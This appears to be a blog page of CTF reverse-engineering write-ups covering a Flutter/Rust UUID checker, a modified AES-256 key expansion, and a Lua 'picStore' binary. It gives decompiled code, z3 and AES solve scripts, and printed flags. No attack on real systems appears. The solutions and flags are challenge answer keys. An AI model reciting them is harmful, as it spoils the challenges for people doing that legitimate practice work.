分类 WriteUps 下的文章

ByteAPK

Flutter rust bridge
ByteCTF{},总长度45
flag被通过ffi传到rust,然后utf8转成c string,去掉了ByteCTF{和后面的},传到一个函数里面check

unsigned char arr1[] =
{
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 
  0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 
  0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 
  0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 
  0x02, 0x02, 0x02, 0x02, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 
  0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 
  0x04, 0x04, 0x04, 0x04, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
unsigned int enc[32] = {
    0x0001EE59, 0x0000022A, 0x00001415, 0x00040714, 0x000013E0, 0x000008B8, 0xFFFDCEA0, 0x0000313B, 
    0x0003D798, 0xFFFFFE6B, 0x00000C4E, 0x00023884, 0x0000008D, 0x00001DB4, 0xFFFC1328, 0x00001EAC, 
    0x00043C64, 0x0000142B, 0xFFFFF622, 0x00023941, 0xFFFFEF6D, 0x0000120C, 0xFFFBD30F, 0x00001EBE, 
    0x00045158, 0xFFFFEF66, 0x00001D3F, 0x0004C46B, 0xFFFFF97A, 0x00001BFD, 0xFFFBA235, 0x00001ED2
};

__int64 __fastcall final_enc(unsigned __int8 *flag_intern, __int64 a2)
{
  __int64 v2; // x9
  __int64 v3; // x9
  __int64 v4; // x9
  __int64 v5; // x9
  __int64 v6; // x9
  __int64 v7; // x9
  __int64 v8; // x9
  __int64 v9; // x9
  unsigned int v10; // w11
  int v11; // w13
  __int64 v12; // x9
  __int64 v13; // x9
  __int64 v14; // x9
  __int64 v15; // x9
  __int64 v16; // x9
  unsigned int v18; // w10
  int v19; // w13
  __int64 v20; // x9
  __int64 v21; // x9
  __int64 v22; // x9
  __int64 v23; // x9
  __int64 v24; // x9
  unsigned int v25; // w10
  int v26; // w13
  __int64 v27; // x9
  __int64 v28; // x9
  __int64 v29; // x9
  __int64 v30; // x9
  __int64 v31; // x9
  unsigned int v32; // w8
  int v33; // w11
  unsigned __int64 v34; // x20
  __int64 v35; // x21
  unsigned int v36; // w22
  int v37; // w8
  __int64 v38; // x10
  int v39; // w9
  unsigned __int64 v40; // x8
  __int64 v41; // x9
  unsigned __int64 v42; // x10
  unsigned __int64 v43; // x8
  int v44; // w12
  int v45; // w14
  int v46; // w3
  int v47; // w13
  int v48; // w2
  int v49; // w16
  int v50; // w15
  int v51; // w17
  int v52; // w6
  int v53; // w4
  int v54; // w12
  int *v55; // x13
  __int64 v57; // [xsp+8h] [xbp-48h] BYREF
  __int64 v58; // [xsp+10h] [xbp-40h]
  unsigned __int64 v59; // [xsp+18h] [xbp-38h]

  v57 = 0LL;
  v58 = 4LL;
  if ( a2 != 36 )
    return 0LL;
  v2 = arr1[*flag_intern];
  if ( (_DWORD)v2 == 36 )
    return 0LL;
  v3 = arr1[flag_intern[v2]] + v2;
  if ( v3 == 36 )
    return 0LL;
  v4 = v3 + arr1[flag_intern[v3]];
  if ( v4 == 36 )
    return 0LL;
  v5 = v4 + arr1[flag_intern[v4]];
  if ( v5 == 36 )
    return 0LL;
  v6 = v5 + arr1[flag_intern[v5]];
  if ( v6 == 36 )
    return 0LL;
  v7 = v6 + arr1[flag_intern[v6]];
  if ( v7 == 36 )
    return 0LL;
  v8 = v7 + arr1[flag_intern[v7]];
  if ( v8 == 36 )
    return 0LL;
  v9 = v8 + arr1[flag_intern[v8]];
  if ( v9 == 36 )
    return 0LL;
  v10 = flag_intern[v9];
  if ( (char)flag_intern[v9] < 0 )
  {
    if ( v10 < 0xE0 )
    {
      v10 = flag_intern[v9 + 1] & 0x3F | ((v10 & 0x1F) << 6);
    }
    else
    {
      v11 = flag_intern[v9 + 2] & 0x3F | ((flag_intern[v9 + 1] & 0x3F) << 6);
      if ( v10 < 0xF0 )
        v10 = v11 | ((v10 & 0x1F) << 12);
      else
        v10 = flag_intern[v9 + 3] & 0x3F | (v11 << 6) & 0xFFE3FFFF | ((v10 & 7) << 18);
    }
  }
  if ( v10 != 45 )
    return 0LL;
  v12 = v9 + arr1[flag_intern[v9]];
  if ( v12 == 36 )
    return 0LL;
  v13 = v12 + arr1[flag_intern[v12]];
  if ( v13 == 36 )
    return 0LL;
  v14 = v13 + arr1[flag_intern[v13]];
  if ( v14 == 36 )
    return 0LL;
  v15 = v14 + arr1[flag_intern[v14]];
  if ( v15 == 36 )
    return 0LL;
  v16 = v15 + arr1[flag_intern[v15]];
  if ( v16 == 36 )
    return 0LL;
  v18 = flag_intern[v16];
  if ( (char)flag_intern[v16] < 0 )
  {
    if ( v18 < 0xE0 )
    {
      v18 = flag_intern[v16 + 1] & 0x3F | ((v18 & 0x1F) << 6);
    }
    else
    {
      v19 = flag_intern[v16 + 2] & 0x3F | ((flag_intern[v16 + 1] & 0x3F) << 6);
      if ( v18 < 0xF0 )
        v18 = v19 | ((v18 & 0x1F) << 12);
      else
        v18 = flag_intern[v16 + 3] & 0x3F | (v19 << 6) & 0xFFE3FFFF | ((v18 & 7) << 18);
    }
  }
  if ( v18 != 45 )
    return 0LL;
  v20 = v16 + arr1[flag_intern[v16]];
  if ( v20 == 36 )
    return 0LL;
  v21 = v20 + arr1[flag_intern[v20]];
  if ( v21 == 36 )
    return 0LL;
  v22 = v21 + arr1[flag_intern[v21]];
  if ( v22 == 36 )
    return 0LL;
  v23 = v22 + arr1[flag_intern[v22]];
  if ( v23 == 36 )
    return 0LL;
  v24 = v23 + arr1[flag_intern[v23]];
  if ( v24 == 36 )
    return 0LL;
  v25 = flag_intern[v24];
  if ( (char)flag_intern[v24] < 0 )
  {
    if ( v25 < 0xE0 )
    {
      v25 = flag_intern[v24 + 1] & 0x3F | ((v25 & 0x1F) << 6);
    }
    else
    {
      v26 = flag_intern[v24 + 2] & 0x3F | ((flag_intern[v24 + 1] & 0x3F) << 6);
      if ( v25 < 0xF0 )
        v25 = v26 | ((v25 & 0x1F) << 12);
      else
        v25 = flag_intern[v24 + 3] & 0x3F | (v26 << 6) & 0xFFE3FFFF | ((v25 & 7) << 18);
    }
  }
  if ( v25 != 45 )
    return 0LL;
  v27 = v24 + arr1[flag_intern[v24]];
  if ( v27 == 36 )
    return 0LL;
  v28 = v27 + arr1[flag_intern[v27]];
  if ( v28 == 36 )
    return 0LL;
  v29 = v28 + arr1[flag_intern[v28]];
  if ( v29 == 36 )
    return 0LL;
  v30 = v29 + arr1[flag_intern[v29]];
  if ( v30 == 36 )
    return 0LL;
  v31 = v30 + arr1[flag_intern[v30]];
  if ( v31 == 36 )
    return 0LL;
  v32 = flag_intern[v31];
  if ( (char)flag_intern[v31] < 0 )
  {
    if ( v32 < 0xE0 )
    {
      v32 = flag_intern[v31 + 1] & 0x3F | ((v32 & 0x1F) << 6);
    }
    else
    {
      v33 = flag_intern[v31 + 2] & 0x3F | ((flag_intern[v31 + 1] & 0x3F) << 6);
      if ( v32 < 0xF0 )
        v32 = v33 | ((v32 & 0x1F) << 12);
      else
        v32 = flag_intern[v31 + 3] & 0x3F | (v33 << 6) & 0xFFE3FFFF | ((v32 & 7) << 18);
    }
  }
  if ( v32 != 45 )
    return 0LL;
  v34 = 0LL;
  v35 = 0LL;
  while ( 1 )
  {
    v36 = flag_intern[v35];
    if ( (char)flag_intern[v35] < 0 )
    {
      v37 = flag_intern[v35 + 1] & 0x3F;
      if ( v36 < 0xE0 )
      {
        v35 += 2LL;
        v36 = v37 & 0xFFFFF83F | ((v36 & 0x1F) << 6);
      }
      else
      {
        v38 = v35 + 3;
        v39 = flag_intern[v35 + 2] & 0x3F | (v37 << 6);
        if ( v36 < 0xF0 )
        {
          v36 = v39 | ((v36 & 0x1F) << 12);
          v35 += 3LL;
        }
        else
        {
          v35 += 4LL;
          v36 = flag_intern[v38] & 0x3F | (v39 << 6) & 0xFFE3FFFF | ((v36 & 7) << 18);
        }
      }
    }
    else
    {
      ++v35;
    }
    if ( v36 != 45 )
      break;
LABEL_55:
    if ( v35 == 36 )
      goto LABEL_67;
  }
  if ( v36 != 0x110000 )
  {
    if ( v34 == v57 )
      sub_3B688(&v57, a2);
    *(_DWORD *)(v58 + 4 * v34++) = v36;
    v59 = v34;
    goto LABEL_55;
  }
LABEL_67:
  v40 = v34 >> 3;
  v41 = 0LL;
  if ( (v34 & 7) != 0 )
    ++v40;
  v42 = v40 + 1;
  v43 = 8LL;
  while ( --v42 )
  {
    if ( v43 > v34 )
      goto LABEL_88;
    if ( v43 - 8 >= 0x19 )
    {
      v43 = 40LL;
      v34 = 32LL;
LABEL_88:
      panic(v43, v34, (__int64)&off_801E0);
    }
    v45 = *(_DWORD *)(v58 + v41 * 4 + 8);
    v44 = *(_DWORD *)(v58 + v41 * 4 + 12);
    v46 = *(_DWORD *)(v58 + v41 * 4);
    v47 = *(_DWORD *)(v58 + v41 * 4 + 4);
    v48 = *(_DWORD *)(v58 + v41 * 4 + 16);
    v49 = *(_DWORD *)(v58 + v41 * 4 + 20);
    v50 = *(_DWORD *)(v58 + v41 * 4 + 24);
    v51 = *(_DWORD *)(v58 + v41 * 4 + 28);
    if ( v51 + v47 * v44 * v49 - (v46 + v50 + v45 * v48) == enc[v41] )
    {
      v52 = v46 * v49;
      if ( v44 - v48 - v46 * v49 + v51 * v47 + v45 + v50 == enc[v41 + 1]
        && v52 - (v48 + v51 * v47) + v45 + v50 * v44 == enc[v41 + 2] )
      {
        v53 = v48 * v46;
        if ( v47 + v48 * v46 - (v51 + v45) + v50 * v49 * v44 == enc[v41 + 3]
          && v49 * v44 + v47 + v45 * v48 - (v50 + v51 * v46) == enc[v41 + 4]
          && v52 + v47 * v44 + v45 - (v50 + v48 * v51) == enc[v41 + 5]
          && v51 - v47 + v45 * v49 + v50 - v53 * v44 == enc[v41 + 6] )
        {
          v43 += 8LL;
          v54 = v44 - v51 - (v47 + v49);
          v55 = &enc[v41];
          v41 += 8LL;
          if ( v54 + v53 + v50 * v45 == v55[7] )
            continue;
        }
      }
    }
    if ( v57 )
      c_free(v58, 4 * v57, 4LL);
    return 0LL;
  }
  if ( v57 )
    c_free(v58, 4 * v57, 4LL);
  return 1LL;
}

通过观察,注意到前面的一堆是在检验是否是UUID,后面则是一个标准的z3题目。
exp

from regadgets import *
from z3 import *

enc = [
    0x0001EE59, 0x0000022A, 0x00001415, 0x00040714, 0x000013E0, 0x000008B8, 0xFFFDCEA0, 0x0000313B, 
    0x0003D798, 0xFFFFFE6B, 0x00000C4E, 0x00023884, 0x0000008D, 0x00001DB4, 0xFFFC1328, 0x00001EAC, 
    0x00043C64, 0x0000142B, 0xFFFFF622, 0x00023941, 0xFFFFEF6D, 0x0000120C, 0xFFFBD30F, 0x00001EBE, 
    0x00045158, 0xFFFFEF66, 0x00001D3F, 0x0004C46B, 0xFFFFF97A, 0x00001BFD, 0xFFFBA235, 0x00001ED2
]

for j in range(4):
    x = [BitVec(f"x{i+1}", 32) for i in range(8)]
    x1, x2, x3, x4, x5, x6, x7, x8 = tuple(i for i in x)
    s = Solver()
    for i in x:
        s.add(i > 0x20, i < 0x80)
    s.add(x8 + x2 * x4 * x6 - (x1 + x7 + x3 * x5) == enc[0+j*8])
    v52 = x1 * x6
    s.add(x4 - x5 - x1 * x6 + x8 * x2 + x3 + x7 == enc[1+j*8])
    s.add(v52 - (x5 + x8 * x2) + x3 + x7 * x4 == enc[2+j*8])
    v53 = x5 * x1
    s.add(x2 + x5 * x1 - (x8 + x3) + x7 * x6 * x4 == enc[3+j*8])
    s.add(x6 * x4 + x2 + x3 * x5 - (x7 + x8 * x1) == enc[4+j*8])
    s.add(v52 + x2 * x4 + x3 - (x7 + x5 * x8) == enc[5+j*8])
    s.add(x8 - x2 + x3 * x6 + x7 - v53 * x4 == enc[6+j*8])
    v54 = x4 - x8 - (x2 + x6)
    s.add(v54 + v53 + x7 * x3 == enc[7+j*8])
    
    if s.check() == sat:
        m = s.model()
        for i in x:
            l = m[i].as_long()
            print(l2b(l).decode(),end='')
            # 32e750c8fb214562af22973fb5176b9c
            # ByteCTF{32e750c8-fb21-4562-af22-973fb5176b9c}

x64_extension

AES-256 密钥扩增魔改
2024-09-20T16:26:55.png
2024-09-20T16:26:31.png

from regadgets import *
k = bytes([0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x1a,0x1b,0x1c,0x1d,0x1e,0x1f])
iv = bytes([0xff, 0xfe, 0xfd, 0xfc, 0xfb, 0xfa, 0xf9, 0xf8, 0xf7, 0xf6, 0xf5, 0xf4, 0xf3, 0xf2, 0xf1, 0xf0])
a = AES(k)
data = open('flag.txt.enc', 'rb').read()
print(a.decrypt_cbc(data, iv))
# b"Hey Sekai CTF Player, I hope you are fine and are enjoying the CTF. Keep going, here is your reward! The flag is SEKAI{Pl34Se_It'5_jUs7_@_wAaaarmUp}\n"

SEKAI{Pl34Se_It'5_jUs7_@_wAaaarmUp}

picStore(re)

https://impartial-poinsettia-a05.notion.site/Lua-953ca64d37c9478b82d394ea2f2a0ca1#ce05742c1bd04285ba87bf4d398a861c

dump 后 用 https://luadec.metaworm.site/在线反编译

-- filename: 
-- version: lua53
-- line: [0, 0] id: 0
menu = function()
  -- line: [2, 12] id: 1
  print("-------------------Pictrue Store System-------------------")
  print("1. upload")
  print("2. download")
  print("3. delete")
  print("4. list")
  print("5. check")
  print("6. exit")
  io.write("choice>> ")
end
upload_impl = function()
  -- line: [14, 21] id: 2
  local r0_2 = a_f3_9a7nhRC()
  if r0_2 ~= nil then
    io.write("img data: ")
    a_1sV7zC5yL_(r0_2)
  end
end
download_impl = function()
  -- line: [23, 31] id: 3
  io.write("link: ")
  local r0_3 = io.read("*number")
  if a_IjKn_GF3FE(r0_3) == 1 then
    io.write("img data: ")
    a_TUBSK2FAhN(r0_3)
  end
end
delete_impl = function()
  -- line: [33, 41] id: 4
  io.write("link: ")
  if a_8jzNK8OZ4i(io.read("*number")) == 0 then
    print("error")
  end
end
list_impl = function()
  -- line: [43, 57] id: 5
  print("-------------------img list-------------------")
  local r0_5 = 0
  local r1_5 = 1
  while r0_5 < 30 do
    if a_IjKn_GF3FE(r0_5) == 1 then
      r1_5 = r1_5 + 1
      print(string.format("%d. pic_%04d. link: http://%d\n", r1_5, r0_5, r0_5))
    end
    r0_5 = r0_5 + 1
  end
end
check_impl = function()
  -- line: [59, 84] id: 6
  local r0_6 = 0
  local r1_6 = 0
  local r2_6 = ""
  local r3_6 = false
  while r0_6 < 30 do
    local r4_6 = a_IjKn_GF3FE(r0_6)
    if r0_6 % 2 == 0 and r4_6 == 1 then
      r1_6 = r1_6 + 1
      local r5_6 = a_Cc_ClWQsa5(r0_6)
      if #r5_6 ~= 2 then
        r3_6 = true
      end
      r2_6 = r2_6 .. r5_6
    end
    r0_6 = r0_6 + 1
  end
  if r1_6 == 15 and #r2_6 == 30 and r3_6 == false and check_func(r2_6) == true then
    print("now, you know the flag~")
    print(r2_6)
  else
    print("you fail!")
  end
end
main_logic = function()
  -- line: [86, 108] id: 7
  while true do
    menu()
    local r0_7 = io.read("*l")
    if r0_7 == "1" then
      upload_impl()
    elseif r0_7 == "2" then
      download_impl()
    elseif r0_7 == "3" then
      delete_impl()
    elseif r0_7 == "4" then
      list_impl()
    elseif r0_7 == "5" then
      check_impl()
    elseif r0_7 == "6" then
      print("bye~")
      break
    else
      print("bad choice")
    end
  end
end
value_list = function(r0_8)
  -- line: [111, 118] id: 8
  local r1_8 = {}
  for r5_8 = 1, string.len(r0_8), 1 do
    r1_8[#r1_8 + 1] = string.byte(r0_8, r5_8)
  end
  return r1_8
end
tobinary = function(r0_9)
  -- line: [122, 135] id: 9
  local r1_9 = r0_9
  local r2_9 = ""
  repeat
    if r1_9 % 2 == 1 then
      local r3_9 = r2_9
      r2_9 = r3_9 .. "1"
    else
      local r3_9 = r2_9
      r2_9 = r3_9 .. "0"
    end
    local r3_9 = math.modf(r1_9 / 2)
    r1_9 = r3_9
  until r1_9 == 0
  return string.reverse(r2_9)
end
xor = function(r0_10, r1_10)
  -- line: [137, 170] id: 10
  local r2_10 = tobinary(r0_10)
  local r3_10 = tobinary(r1_10)
  local r4_10 = string.len(r2_10)
  local r5_10 = string.len(r3_10)
  local r6_10 = 0
  local r7_10 = 0
  local r8_10 = ""
  if r5_10 < r4_10 then
    for r12_10 = 1, math.floor(r4_10 - r5_10), 1 do
      r3_10 = "0" .. r3_10
    end
    r6_10 = r4_10
  elseif r4_10 < r5_10 then
    for r12_10 = 1, math.floor(r5_10 - r4_10), 1 do
      r2_10 = "0" .. r2_10
    end
    r6_10 = r5_10
  end
  for r12_10 = 1, r6_10, 1 do
    if string.sub(r2_10, r12_10, r12_10) == string.sub(r3_10, r12_10, r12_10) then
      r8_10 = r8_10 .. "0"
    else
      r8_10 = r8_10 .. "1"
    end
  end
  return tonumber(r8_10, 2)
end
check_func = function(r0_11)
  -- line: [172, 195] id: 11
  local input = value_list(r0_11)
  local r2_11 = {}
  local ans = {
    105,
    244,
    63,
    10,
    24,
    169,
    248,
    107,
    129,
    138,
    25,
    182,
    96,
    176,
    14,
    89,
    56,
    229,
    206,
    19,
    23,
    21,
    22,
    198,
    179,
    167,
    152,
    66,
    28,
    201,
    213,
    80,
    162,
    151,
    102,
    36,
    91,
    37,
    50,
    17,
    170,
    41,
    3,
    84,
    85,
    226,
    131,
    38,
    71,
    32,
    18,
    142,
    70,
    39,
    112,
    220,
    16,
    219,
    159,
    222,
    11,
    119,
    99,
    203,
    47,
    148,
    185,
    55,
    93,
    48,
    153,
    113,
    1,
    237,
    35,
    75,
    67,
    155,
    161,
    74,
    108,
    76,
    181,
    233,
    186,
    44,
    125,
    232,
    88,
    8,
    95,
    163,
    200,
    249,
    120,
    243,
    174,
    212,
    252,
    234,
    58,
    101,
    228,
    86,
    109,
    144,
    104,
    121,
    117,
    87,
    15,
    132,
    12,
    20,
    165,
    115,
    136,
    135,
    118,
    69,
    68,
    2,
    82,
    123,
    250,
    251,
    53,
    255,
    51,
    221,
    211,
    195,
    145,
    140,
    254,
    0,
    116,
    43,
    29,
    217,
    197,
    183,
    168,
    188,
    34,
    218,
    146,
    147,
    98,
    149,
    246,
    180,
    103,
    33,
    40,
    207,
    208,
    192,
    143,
    26,
    154,
    225,
    100,
    141,
    175,
    124,
    230,
    62,
    177,
    205,
    110,
    202,
    253,
    173,
    46,
    52,
    114,
    164,
    166,
    137,
    158,
    122,
    13,
    83,
    178,
    133,
    189,
    187,
    7,
    184,
    77,
    245,
    216,
    190,
    194,
    72,
    157,
    172,
    171,
    199,
    160,
    45,
    49,
    27,
    204,
    81,
    6,
    92,
    59,
    209,
    239,
    130,
    97,
    61,
    214,
    215,
    73,
    90,
    126,
    42,
    30,
    240,
    79,
    224,
    78,
    223,
    111,
    60,
    4,
    5,
    196,
    231,
    106,
    64,
    139,
    235,
    150,
    227,
    238,
    191,
    127,
    31,
    156,
    54,
    241,
    242,
    134,
    247,
    128,
    65,
    94,
    57,
    210,
    236,
    9,
    193
  }
  for i = 1, #input, 1 do
    input[i] = xor(input[i], i - 1)
    input[i] = xor(input[i], 255)
    input[i] = input[i] & 255
    r2_11[#r2_11 + 1] = ans[input[i] + 1]
  end
  local r4_11 = a_AHy3JniQH4(r2_11) == 1
end
main = function()
  -- line: [198, 201] id: 12
  a_bfBfrMZriK()
  main_logic()
end
main()

注意到是调用了check_23,并且这之前还有个简单加密

from z3 import Int, Solver
l = 30
a1 = [Int(f"x{i}") for i in range(l)]
s = Solver()
v1=a1[0]
v2=a1[1]
v3=a1[2]
v4=a1[3]
v5=a1[4]
v6=a1[5]
v7=a1[6]
v8=a1[7]
v10=a1[8]
v24=a1[9]
v25=a1[10]
v26=a1[11]
v27=a1[12]
v28=a1[13]
v29=a1[14]
v30=a1[15]
v31=a1[16]
v32=a1[17]
v33=a1[18]
v34=a1[19]
v35=a1[20]
v36=a1[21]
v37=a1[22]
v38=a1[23]
v39=a1[24]
v40=a1[25]
v20=a1[26]
v41=a1[27]
v22=a1[28]
s.add(255036*v7+-90989*v3+-201344*v4+122006*v5+-140538*v6+109859*v2-109457*v1-9396023 == 0)
s.add(277432*v6+110191*v3+-186022*v4+175123*v2-75564*v5-252340*v1-12226612 == 0)
s.add(127326*v4+260948*v2+-102835*v1+225038*v5-129683*v3-45564209 == 0)
s.add(-170345*v2+217412*v3-26668*v1+38500*v4-27440782 == 0)
s.add(25295*v2+69369*v3+191287*v1-24434293 == 0)
s.add(72265*v1-2384745 == 0)
s.add(264694*v1-190137*v2+19025100 == 0)
s.add(101752*v24+67154*v8+-20311*v1+-30496*v6+-263329*v7+-99420*v10+255348*v3+169511*v4-121471*v2+231370*v5-33888892 == 0)
s.add(17253*v8+-134891*v7+144501*v4+220594*v2+263746*v3+122495*v6+74297*v10+205480*v1-32973*v5-115484799 == 0)
s.add(251337*v3+-198187*v6+-217900*v2+-62192*v8+-138306*v7+-165151*v4-118227*v1-22431*v5+72699617 == 0)
s.add(243012*v27+-233931*v4+66595*v7+-273948*v5+-266708*v24+75344*v8-108115*v3-17090*v25+240281*v10+202327*v1-253495*v2+233118*v26+154680*v6+25687761 == 0)
s.add(41011*v8+-198187*v1+-117171*v7+-178912*v3+9797*v24+118730*v10-193364*v5-36072*v6+10586*v25-110560*v4+173438*v2-176575*v26+54358815 == 0)
s.add(-250878*v24+108430*v1+-136296*v5+11092*v8+154243*v7+-136624*v3+179711*v4+-128439*v6+22681*v25-42472*v10-80061*v2+34267161 == 0)
s.add(65716*v30+-18037*v26+-42923*v7+-33361*v4+161566*v6+194069*v25+-154262*v2+173240*v3-31821*v27-80881*v5+217299*v8-28162*v10+192716*v1+165565*v24+106863*v29-127658*v28-75839517 == 0)
s.add(-236487*v24+-45384*v1+46984*v26+148196*v7+15692*v8+-193664*v6+6957*v10+103351*v29-217098*v28+78149*v4-237596*v5-236117*v3-142713*v25+24413*v27+232544*v2+78860648 == 0)
s.add(-69129*v10+-161882*v3+-39324*v26+106850*v1+136394*v5+129891*v2+15216*v27+213245*v24-73770*v28+24056*v25-123372*v8-38733*v7-199547*v4-10681*v6+57424065 == 0)
s.add(-268870*v30+103546*v24+-124986*v27+42015*v7+80222*v2+-77247*v10+-8838*v25+-273842*v4+-240751*v28-187146*v26-150301*v6-167844*v3+92327*v8+270212*v5-87705*v33-216624*v1+35317*v31+231278*v32-213030*v29+114317949 == 0)
s.add(-207225*v1+-202035*v3+81860*v27+-114137*v5+265497*v30+-216722*v8+276415*v28+-201420*v10-266588*v32+174412*v6+249222*v24-191870*v4+100486*v2+37951*v25+67406*v26+55224*v31+101345*v7-76961*v29+33370551 == 0)
s.add(175180*v29+25590*v4+-35354*v30+-173039*v31+145220*v25+6521*v7+99204*v24+72076*v27+207349*v2+123988*v5-64247*v8+169099*v6-54799*v3+53935*v1-223317*v26+215925*v10-119961*v28-83559622 == 0)
s.add(43170*v3+-145060*v2+199653*v6+14728*v30+139827*v24+59597*v29+2862*v10+-171413*v31+-15355*v25-71692*v7-16706*v26+264615*v1-149167*v33+75391*v27-2927*v4-187387*v5-190782*v8-150865*v28+44238*v32-276353*v34+82818982 == 0)
s.add(-3256*v27+-232013*v25+-261919*v29+-151844*v26+11405*v4+159913*v32+209002*v7+91932*v34+270180*v10+-195866*v3-135274*v33-261245*v1+24783*v35+262729*v8-81293*v24-156714*v2-93376*v28-163223*v31-144746*v5+167939*v6-120753*v30-13188886 == 0)
s.add(-240655*v35+103437*v30+236610*v27+100948*v8+82212*v6+-60676*v5+-71032*v3+259181*v7+100184*v10+7797*v29+143350*v24+76697*v2-172373*v25-110023*v37-13673*v4+129100*v31+86759*v1-101103*v33-142195*v36+28466*v32-27211*v26-269662*v34+9103*v28-96428951 == 0)
s.add(-92750*v28+-151740*v27+15816*v35+186592*v24+-156340*v29+-193697*v2+-108622*v8+-163956*v5+78044*v4+-280132*v36-73939*v33-216186*v3+168898*v30+81148*v34-200942*v32+1920*v1+131017*v26-229175*v10-247717*v31+232852*v25+25882*v7+144500*v6+175681562 == 0)
s.add(234452*v34+-23111*v29+-40957*v2+-147076*v8+16151*v32+-250947*v35+-111913*v30+-233475*v24+-2485*v28+207006*v26+71474*v3+78521*v1-37235*v36+203147*v5+159297*v7-227257*v38+141894*v25-238939*v10-207324*v37-168960*v33+212325*v6+152097*v31-94775*v27+197514*v4+62343322 == 0)
s.add(-142909*v34+-111865*v31+258666*v36+-66780*v2+-13109*v35+-72310*v25+-278193*v26+-219709*v24+40855*v8+-270578*v38+96496*v5+-4530*v1+63129*v28-4681*v7-272799*v30-225257*v10+128712*v37-201687*v39+273784*v3+141128*v29+93283*v32+128210*v33+47550*v6-84027*v4+52764*v40-140487*v27+105279220 == 0)
s.add(216020*v38+-248561*v29+-86516*v33+237852*v26+-132193*v31+-101471*v3+87552*v25+-122710*v8+234681*v5+-24880*v7+-245370*v1+-17836*v36-225714*v34-256029*v4+171199*v35+266838*v10-32125*v24-43141*v32-87051*v30-68893*v39-242483*v28-12823*v2-159262*v27+123816*v37-180694*v6+152819799 == 0)
s.add(-116890*v3+67983*v27+-131934*v4+256114*v40+128119*v24+48593*v33+-41706*v2+-217503*v26+49328*v6+223466*v7+-31184*v5+-208422*v36+261920*v1+83055*v20+115813*v37+174499*v29-188513*v35+18957*v25+15794*v10-2906*v28-25315*v8+232180*v32-102442*v39-116930*v34-192552*v38-179822*v31+265749*v30-54143007 == 0)
s.add(-215996*v4+-100890*v40+-177349*v7+-159264*v6+-227328*v27+-91901*v24+-28939*v10+206392*v41+6473*v25+-22051*v20+-112044*v34+-119414*v30+-225267*v35+223380*v3+275172*v5+95718*v39-115127*v29+85928*v26+169057*v38-204729*v1+178788*v36-85503*v31-121684*v2-18727*v32+109947*v33-138204*v8-245035*v28+134266*v37+110228962 == 0)
s.add(-165644*v32+4586*v39+138195*v25+155259*v35+-185091*v3+-63869*v31+-23462*v30+150939*v41+-217079*v8+-122286*v6+5460*v38+-235719*v7+270987*v26+157806*v34+262004*v29-2963*v28-159217*v10+266021*v33-190702*v24-38473*v20+122617*v2+202211*v36-143491*v27-251332*v4+196932*v5-155172*v22+209759*v40-146511*v1+62542*v37+185928391 == 0)
s.add(57177*v24+242367*v39+226332*v31+15582*v26+159461*v34+-260455*v22+-179161*v37+-251786*v32+-66932*v41+134581*v1+-65235*v29+-110258*v28+188353*v38+-108556*v6+178750*v40+-20482*v25+127145*v8+-203851*v5+-263419*v10+245204*v33+-62740*v20+103075*v2-229292*v36+142850*v30-1027*v27+264120*v3+264348*v4-41667*v35+130195*v7+127279*a1[29]-51967523 == 0)


print(s.check())
m = s.model()

result = []
for i in a1:
    result.append(m[i].as_long())
print(result)

